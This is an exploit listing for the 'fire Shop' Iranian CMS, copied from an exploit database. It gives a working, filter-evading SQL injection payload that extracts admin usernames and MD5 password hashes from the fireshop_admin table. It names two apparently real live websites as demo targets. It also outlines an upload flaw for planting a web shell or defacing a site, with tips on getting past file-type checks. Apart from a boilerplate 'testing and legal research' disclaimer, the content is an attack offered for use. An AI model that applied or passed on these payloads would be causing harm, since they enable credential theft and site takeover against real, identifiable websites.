Below is a copy: fire Shop IRANIAN CMS SQL injection & Remote File Upload
# Exploit Title: fire Shop IRANIAN CMS SQL injection & Remote File Upload
# Date: 2019-05-10
# Dork : intext:" "
# Exploit Author: S I R M A X
# Vendor Homepage: firedesign.ir
# Version: Final Version
# Tested on: win,linux
=================================================================================
[SQL injection]
[+] Method ( Sql injection ) Nullix Security Team of IRan
[+] Admin Login Page : www.[Target].com/admin.php
[+] parameter : ID == php?ID=
=================
Mode Hash : MD5
=================
Exploit ==>
category.php?id=1' /*!50000UNION*/ /*!50000SELECT*/ 1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(fireshop_admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,username,0x3c62723e,0x70617373,0x203d3d3e20,password,0x3c62723e,0x3c62723e))))x),3,4,5,6,7,8,9,10,11,12,13,14-- -
<-> Method Bypass[ Order by ] ======> you can use >> = category.php?id=15' order by asc-- -
=================================================================================
Demo:
[+] http://perfectmarket.biz/sss/category.php?id=[SQL]
[+] http://www.banehsalami.com/--HR7628/category.php?id=[SQL]
=================================================================================
Remote File upload
============================
[+] RFU Method
<+> POC : http://www.banehsalami.com/upload.php
<-> Add URL site.com/upload.php
<+> You can Upload Shell and Def
<-> for Bypass Filetype
<=> using Tamper Data Or Charles
======================================
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum